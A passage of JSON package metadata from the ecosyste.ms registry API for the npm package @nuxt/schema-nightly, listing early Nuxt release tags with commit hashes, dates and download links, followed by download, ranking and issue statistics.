ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:37.902Z","dependent_packages_count":0,"downloads":19355,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.22123301104748,"dependent_packages_count":52.61855168586287,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.91989234845518},"purl":"pkg:npm/%40nuxt/schema-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/schema-nightly","docker_dependents_count":1,"docker_downloads_count":15,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/schema-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/schema-nightly/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":14658